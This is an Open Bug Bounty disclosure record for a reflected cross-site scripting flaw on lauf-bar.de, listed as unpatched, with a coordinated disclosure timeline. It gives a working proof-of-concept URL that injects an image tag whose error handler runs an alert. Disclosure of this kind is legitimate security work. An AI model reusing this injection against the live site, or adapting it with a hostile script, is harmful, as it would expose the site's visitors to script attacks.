lauf-bar.de XSS vulnerability

2017-03-21T20:39:00
ID OBB:220205
Type openbugbounty
Reporter secuninja
Modified 2017-04-05T07:14:00

Description

Vulnerable URL:
https://www.lauf-bar.de/index.php?lang=0&cl;=search&searchparam;=%22%3Etrolo%3Ci%3Etruli%3Cimg+src%3Do%20onerror=alert(%27openbugbounty%27)%3E&__cf_waf_tk__=024477002A3ELCcb5_pCWVIs9KcAgKVapnKE
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1694836
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 March, 2017 20:39 GMT
Vulnerability existence verified and confirmed| 22 March, 2017 06:57 GMT
Generic security notifications sent to website owner| 22 March, 2017 06:57 GMT
Vulnerability details disclosed by researcher| 5 April, 2017 07:14 GMT